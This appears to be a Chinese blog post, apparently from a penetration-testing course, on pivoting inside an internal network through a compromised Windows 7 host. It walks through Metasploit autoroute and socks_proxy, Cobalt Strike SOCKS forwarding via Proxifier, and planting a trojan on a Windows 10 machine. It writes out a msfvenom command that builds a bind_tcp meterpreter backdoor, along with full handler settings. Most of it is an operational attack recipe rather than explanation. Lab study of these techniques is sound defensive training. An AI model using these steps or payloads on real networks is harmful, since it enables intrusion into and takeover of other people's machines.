内网安全-代理技术-socket协议

小迪安全网络架构图:

背景:当前获取window7 出网主机的shell。

1.使用msf上线,查看路由

run autoroute -p

添加路由:

run post/multi/manage/autoroute

使用socks模块开启节点,作为流量跳板

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set srvport 1122

srvport => 1122

msf6 auxiliary(server/socks_proxy) > run

使用socket cap 进行代理

2.使用cs进行渗透测试

windwos7上线cs木马

点击代理转发选择socket

输入账户密码后,使用proifixer进行流量转发

配置为目标站点走socket5

3.使用cs进行windows10 上线cs

方案:创建木马将数据传递给本地4444端口

使用window7正向连接目标4444端口

cs配置正向监听器:

生成木马:

模拟执行木马,在windows7交互会话窗口:

connect 192.168.11.129 4444 即可上线

4.使用msf进行windows10 上线

生成正向连接后门:msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=2222 -f exe > bd.exe

放置windows10上运行

msf执行:

msf6 exploit(multi/handler) > use exploit/multi/handler

\*\] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) \> set payload windows/meterpreter/bind_tcp payload =\> windows/meterpreter/bind_tcp msf6 exploit(multi/handler) \> set rhost 192.168.11.129 rhost =\> 192.168.11.129 msf6 exploit(multi/handler) \> set lport 2222 lport =\> 2222 msf6 exploit(multi/handler) \> run

相关推荐
Aniugel22 分钟前
web前端跨域精选面试题
安全·面试·https
ASCO1100691 小时前
电力行业在保障用电安全方面正积极采用先进的物联网技术
安全
刘小奇�多2 小时前
销售易CRM:技术架构与安全性能的深度解析
安全·架构
极小狐2 小时前
极狐GitLab 安全文件管理功能介绍
linux·运维·数据库·安全·elasticsearch·gitlab
恒拓高科WorkPlus3 小时前
内部聊天软件,BeeWorks-安全的企业内部通讯软件
大数据·网络·安全
卓豪终端管理5 小时前
如何安全地管理固定功能设备?
java·大数据·开发语言·网络·人工智能·安全
阳光普照世界和平12 小时前
网络安全与信息安全防护措施
网络·安全
上海云盾-高防顾问17 小时前
WAF防火墙:构筑Web应用安全的“隐形护盾”
安全
DPLSLAB617 小时前
从 SolarWinds 事件看 CCRC 认证的供应链安全价值
服务器·网络·安全
ASCO11006918 小时前
施工用电的基本原则与相关的安全规定
安全